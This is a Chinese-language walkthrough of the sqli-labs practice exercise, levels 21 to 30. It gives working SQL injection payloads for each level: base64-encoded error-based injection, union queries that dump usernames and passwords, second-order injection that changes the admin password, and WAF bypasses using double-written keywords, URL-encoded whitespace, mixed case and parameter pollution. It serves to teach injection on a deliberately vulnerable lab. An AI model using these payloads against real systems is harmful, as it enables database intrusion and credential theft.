第二十一关
第二十一关我们正常登陆后看到,uname后面变成了一堆字母
这是经过base64编码之后的样子,所以就照葫芦画瓢,将我payload的uname后面的部分转码成base64,这里可以用正常的注入套路order by等一步步走,但为了方便我直接用报错注入,但这里注意闭合是')
uname=admin') and updatexml(1,concat(0x7e,(select database())),0) #
将uname=后面的部分都base64编码一下
uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksMCkgIw==
爆内容:
uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDAsMSkpLDApIw==
第二十二关
这关正常登陆和上关回显一样盲猜就是换了个闭合符号,测试下还真是闭合换成了"双引号
爆内容:
uname=YWRtaW4iICBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDAsMSkpLDApIw==
第二十三关
这关测试一下好像怎么换注释符都没作用,那就换一种注释方式,加两个引号将前后的引号闭合掉。
?id=-1' union select 11,2,database() '
或者用or语句闭合掉后面的引号
?id=' union select 1,group_concat(password),group_concat(username) from users where 11 or '1'='1
第二十四关
这里是个二次注入,原本正常的数据在被调用时,其中的某些字符被当成sql语句执行了。
这里先注册一个admin' #用户,登陆。在修改密码的时候sql语句是这样的,用户名和密码被直接拿出来使用,没有转义。
所以当我们修改密码时Sql语句变为
UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='
也就是执行了UPDATE users SET passwd="New_Pass" WHERE username =' admin'
等于说变成修改了admin的密码,这里我将密码改为1234,看修改后能不能登陆admin账户,修改成功后会有succe提示
登陆admin
成功
第二十五关
这关看题目应该把and和or过滤了,但是只要双写就绕过了,因为他只过滤一次。或者直接用union select联合查询。
也可以用 &&和||代替and和or
http://192.168.0.101/sql/less-25/?id=1' anandd '1'='1' --+
-1' union select 1,2,group_concat(passwoorrd) from users --+
第二十五a关
这关一样的,就是变成数字型注入,
-1' union select 1,2,group_concat(passwoorrd) from users --+
第二十六关
这关过滤了很多
空格,and,or,,/*,#等都被过滤了.所以我们直接给他加个url编码
但是这里能用的空格编码%a0在windows上不能解析,懒得在Linux上搭环境了,就不截图了。
%09 TAB键(水平)
%0a 新建一行
%0c 新的一页
%0d return功能
%0b TAB键(垂直)
%a0 空格
%27单引号
用'1'='1进行闭合或者‘闭合,(注意在hackbar中输入&&时,需要自行URL编码为%26%26,否则会报错,而输入||不需要)
爆库名:
?id=0'union%a0select%a01,database(),3%26%26'1'='1
爆内容:
?id=0'union%a0select%a01,group_concat(passwoorrd)%a0from%a0users%a0where%a01,3%26%26'1'='1
第二十六a关
这关闭合多了个)
爆内容:
id=0')%0bunion%0bselect%0b1,group_concat(username,0x3b,passwoorrd),3%0bfrom%0busers%0bwhere%0b('1')=('1
第二十七关
这关把 union select一起过滤了,用大小写UniON SelECt绕过就行
爆内容:
?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1
第二十七a关
和第二十七关一样,就是把单引号变成双引号闭合了
第二十八关
这关过滤了组合union select双写union union select select就行,其他还是替换url编码。
这关and没过滤
爆数据库名:
?id=1'and(ascii(substr((sElect%a0database()),1,1))>115)and'1'='1
第二十八a关
这关闭合变成了')其他一样。
第二十九关
这关开始没整明白他干了啥,我输入啥都行,看hint就把我的‘单引号url编码了,
直接爆数据。
?id=-1' union select 1,2,group_concat(username,0x7e,password) from users --+
但看题目好像用了waf百度下又看了源码。
好像是输入两个id值,waf看前面的id值过关了,apache就解析后面的
变这样
?id=1&id=0' union select 1,group_concat(password),2 from users --+
第三十关
把单引号换成双引号就行了,可能是专门设置这样的关卡来提醒我们,过waf时要多尝试不同的可能.........